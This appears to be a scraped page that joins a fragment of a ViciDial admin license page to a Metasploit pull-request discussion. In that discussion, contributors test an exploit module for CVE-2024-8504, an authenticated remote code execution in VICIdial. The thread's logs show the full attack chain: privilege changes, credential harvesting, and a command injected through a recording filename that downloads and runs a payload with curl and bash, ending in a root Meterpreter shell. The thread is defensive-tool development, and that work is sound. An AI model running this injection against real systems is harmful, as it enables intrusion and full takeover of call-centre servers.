	left: -1000px;
	}
.chart_td
	{background-image: url(images/gridline58.gif); background-repeat: repeat-x; background-position: left top; border-left: 1px solid #e5e5e5; border-right: 1px solid #e5e5e5; padding:0; border-bottom: 1px solid #e5e5e5; background-color:transparent;}

.head_style
	{
	background-color: 015B91;
	}
.head_style:hover{background-color: #262626;}

.head_style_selected
	{
	background-color: A3C3D6;
	}
.head_style_selected:hover{background-color: A3C3D6;}

.subhead_style
	{
	background-color: #E6E6E6;
	}
.subhead_style:hover{background-color: white;}

.subhead_style_selected
	{
	background-color: #C6C6C6;
	}
.subhead_style_selected:hover{background-color: #C6C6C6;}

.adminmenu_style_selected
	{
	background-color: white;
	}
.adminmenu_style_selected:hover{background-color: #E6E6E6;}

.records_list_x
	{
	background-color: #B9CBFD;
	}
.records_list_x:hover{background-color: #E6E6E6;}

.records_list_y
	{
	background-color: #9BB9FB;
	}
.records_list_y:hover{background-color: #E6E6E6;}


.horiz_line
	{
	height: 0px;
	margin: 0px;
	border-bottom: 1px solid #E6E6E6;
	font-size: 1px;
	}
.horiz_line_grey
	{
	height: 0px;
	margin: 0px;
	border-bottom: 1px solid #9E9E9E;
	font-size: 1px;
	}

.sub_sub_head_links
	{
	font-family:HELVETICA;
	font-size:11;
	color:BLACK;
	}

-->












ADMINISTRATION





			  Reports












HOME |  Timeclock |  Chat | Logout (6666)


Wednesday September 25, 2024 16:10:43 PM














 Welcome to ViciDial: copyright, trademark and license page

Copyright:    The ViciDial Contact Center Suite is maintained by the ViciDial Group, © 2024
Trademark:    "VICIDIAL" is a registered trademark of the ViciDial Group. Here is our trademark use policy
License:    The ViciDial Contact Center Suite is released under the AGPLv2 open source license.
Source Code:    The ViciDial Call Center Suite software is available for download, and for use, free of cost. You can download the easy to install ViciBox CD ISO version, or only the source code

Continue on to the Initial Setup
 Other integrated software disclaimers:

Matex: Copyright:    Matex PHP Mathematical expression parser and evaluator library was written by Dorin Marcoci, © 2023
License:    Matex is licensed under the MIT open source license
Source Code:    Matex original source code is available at this link.

Pure-knob: Copyright:    The pure-knob javascript library was written by Andre Plötze, © 2018
License:    Pure-knob is licensed under the Apache 2.0 open source license
Source Code:    Pure-knob original source code is available at this link.
   Chart.js: Copyright:    The Chart.js javascript library was written by Chart.js Contributors, © 2018
License:    Chart.js is licensed under the MIT open source license
Source Code:    Chart.js original source code is available at this link.
   classAudioFile: Copyright:    The classAudioFile PHP library was written by Michael Kamleitner, © 2003
License:    classAudioFile is licensed under the GPL open source license
Source Code:    classAudioFile original source code is available at this link.
   Dygraphs: Copyright:    The Dygraphs javascript library was written by Dygraphs Contributors, © 2023
License:    Dygraphs is licensed under the MIT open source license
Source Code:    Dygraphs original source code is available at this link.
   Jquery: Copyright:    The Jquery javascript library was written by OpenJS Foundation contributors, © 2023
License:    Jquery is licensed under the MIT open source license
Source Code:    Jquery original source code is available at this link.





VERSION: 2.14-916aBUILD: 240419-1817
© 2024 ViciDial Group





if (!window.A_TCALSIDX)
	{
	if (document.addEventListener)
		window.removeEventListener('scroll', f_tcalHideAll);
	if (window.attachEvent)
		window.detachEvent('onscroll', f_tcalHideAll);
	}

[Chocapikk]

Hello @jheysel-r7,

I’ve encountered this bug before, but I’m not sure why it’s happening. I’ve run it multiple times, and it worked before. I have to admit, this exploit isn't very stable. I’ll rebuild the lab from scratch and try to reproduce the issue(s).

[Chocapikk]

Hey @jheysel-r7 , I know why this is happening:

msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > exploit 
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > 
[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] VICIdial version: 2.14-705
[+] The target is vulnerable.
[*] Using URL: http://192.168.1.36:5000/mjl8eJ7YbY
[*] Server started.
[*] Payload is ready at /
[+] Authenticated successfully as user '6666'
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign 'Predovic Group'
[+] Updated dummy campaign settings
[+] Created dummy list 'Predovic Group List' for campaign '552198'
[-] Exploit aborted due to failure: not-found: Failed to find the "MODIFY" link in the phone credentials page
[*] Server stopped.

Because you need to log in the first time on the vicidial instance and set up a new password first to "activate" all the features.
Then you can try again and it will work.

metasploit-framework/documentation/modules/exploit/unix/webapp/vicidial_agent_authenticated_rce.md

Line 158 in 0515a1d

- Access the web panel by navigating to the administration page and completing the initial setup.

[Chocapikk]

I'm having some issue getting this working.

msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > 
[*] Fetch handler listening on 172.26.247.30:8080
[*] HTTP server started
[*] Adding resource /GvrbULWAtrIMO9PwicnKJw
[*] Started reverse TCP handler on 172.26.247.30:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] VICIdial version: 2.14-705
[+] The target is vulnerable.
[*] Using URL: http://172.26.247.30:5000/J4VChGLMC
[*] Server started.
[*] Payload is ready at /
[+] Authenticated successfully as user '6666'
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign 'Corkery, Lueilwitz and Davis'
[+] Updated dummy campaign settings
[+] Created dummy list 'Corkery, Lueilwitz and Davis List' for campaign '219810'
[+] Found phone credentials: Extension=callin, Password=password, Recording Extension=8309
[+] Retrieved dynamic field names: MGR_login20240919, MGR_pass20240919
[+] Entered "manager" credentials to override shift enforcement
[+] Authenticated as agent using phone credentials
[+] Session Name: 1726745884_8300defaul13257799, Session ID: 8600051
[*] Generated malicious command: $([email protected]:5000$IFS-o$IFS.EBKx&&bash$IFS.EBKx)
[-] Exploit aborted due to failure: unknown: Failed to get recording ID
[*] Server stopped.
Interrupt: use the 'exit' command to quit
msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > 

Last request

[+] Authenticated as agent using phone credentials
[+] Session Name: 1726746046_8300defaul12080600, Session ID: 8600051
[*] Generated malicious command: $([email protected]:5000$IFS-o$IFS.eeAs&&bash$IFS.eeAs)
####################
# Request:
####################
POST /agc/manager_send.php HTTP/1.1
Host: 172.26.247.31                                                                                                                                                                                                         
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15                                                                                          
Authorization: Basic NjY2NjpwYXNzd29yZA==                                                                                                                                                                                   
Content-Type: application/x-www-form-urlencoded                                                                                                                                                                             
Content-Length: 317                                                                                                                                                                                                         
                                                                                                                                                                                                                            
server_ip=172.26.247.31&session_name=1726746046_8300defaul12080600&user=6666&pass=password&ACTION=MonitorConf&format=text&channel=Local/8309%40default&filename=%24%28curl%24IFS-k%24IFS%40172.26.247.30%3a5000%24IFS-o%24IFS.eeAs%26%26bash%24IFS.eeAs%29&exten=8309&ext_context=default&ext_priority=1&FROMvdc=YES&FROMapi=                                                                                                                           
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Thu, 19 Sep 2024 11:40:46 GMT                                                                                                                                                                                         
Server: Apache                                                                                                                                                                                                              
X-Powered-By: PHP/7.4.33                                                                                                                                                                                                    
Cache-Control: no-cache, must-revalidate                                                                                                                                                                                    
Pragma: no-cache                                                                                                                                                                                                            
Content-Length: 68                                                                                                                                                                                                          
Content-Type: text/html; charset=utf-8                                                                                                                                                                                      
                                                                                                                                                                                                                            
Invalid session_name: |1726746046_8300defaul12080600|172.26.247.31|                                                                                                                                                         
                                                                                                                                                                                                                            
[-] Exploit aborted due to failure: unknown: Failed to get recording ID
[*] Server stopped.

About this bug @dledda-r7, I'm not sure what's happening, but I suspect that it depends on the IP or domain in the requests, depends on network configuration it may not work. For my lab i'm using a VM with Bridged network and it's working fine.

[jheysel-r7]

Thanks for another great module @Chocapikk! Also thanks for pointing me to the last step of the setup instructions I had missed originally, much appreciated. After I completed that I was able to establish a sessions without issue.

As I mentioned above in a separate comment, given the exploit constraints I think this is being exploited in the best way possible.

Testing

msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > [*] VICIdial version: 2.14-705
[+] The target is vulnerable.
[*] Using URL: http://172.16.199.1:5000/eRGpu6LdacexOe
[*] Server started.
[*] Payload is ready at /
[+] Authenticated successfully as user '6666'
[+] Updated user settings to increase privileges
[+] Updated system settings
[+] Created dummy campaign 'Ratke, Pfeffer and Howe'
[+] Updated dummy campaign settings
[+] Created dummy list 'Ratke, Pfeffer and Howe List' for campaign '710856'
[+] Found phone credentials: Extension=callin, Password=N0tpassword, Recording Extension=8309
[+] Retrieved dynamic field names: MGR_login20240930, MGR_pass20240930
[+] Entered "manager" credentials to override shift enforcement
[+] Authenticated as agent using phone credentials
[+] Session Name: 1727728628_8300defaul18642785, Session ID: 8600051
[*] Generated malicious command: $([email protected]:5000$IFS-o$IFS.GIXQ&&bash$IFS.GIXQ)
[*] MonitorConf command sent for Channel Local/8309@default on 172.16.199.145
Filename: $([email protected]:5000$IFS-o$IFS.GIXQ&&bash$IFS.GIXQ)
RecorDing_ID: 2
 RECORDING WILL LAST UP TO 60 MINUTES

[+] Stopped malicious recording to prevent file size from growing
[*] Deleting dummy campaign with ID: 710856
[+] Campaign 710856 deleted successfully.
[*] Waiting for 300 seconds to allow the cron job to execute the payload...
[*] Received request at: / - Client Address: 172.16.199.145
[*] Sending response to 172.16.199.145 for /
[*] Sending stage (3045380 bytes) to 172.16.199.145
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.145:17986) at 2024-09-30 13:39:22 -0700

msf6 exploit(unix/webapp/vicidial_agent_authenticated_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.145
OS           :  (Linux 5.14.21-150500.55.12-default)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[Chocapikk]

Thanks so much for the feedback @jheysel-r7, I really appreciate it! Glad you were able to get it working after completing the setup. I agree, given the constraints, this seems like the best way to exploit it.

[jheysel-r7]

Release Notes

This adds a module to exploit CVE-2024-8504 an authenticated RCE in VICIdial